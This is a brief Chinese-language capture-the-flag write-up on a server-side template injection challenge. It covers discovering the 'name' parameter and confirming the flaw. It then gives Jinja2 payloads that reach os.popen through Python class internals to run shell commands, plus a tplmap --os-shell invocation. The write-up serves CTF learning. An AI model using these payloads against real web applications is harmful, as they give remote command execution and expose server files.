文章目录 手注tplmap 手注 刚进入题目 知道是SSTI注入 但是没找到注入点学到了一个新的工具 Arjun 扫描到get参数name?name={{'aaa'.upper()}} 确定是SSTI注入构造payload: {% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% endif %}{% endfor %} 获取flag {% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('cat flag.txt').read()}}{% endif %}{% endfor %} 也可以用python自带的魔法函数去进行SSTI注入 payload: ?name={{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}} tplmap python tplmap.py -u http://c19debfb-5c8c-45c7-86f8-49f15f2a6301.node3.buuoj.cn/?name= --os-shell 这道题没有过滤直接就可以拿Flag了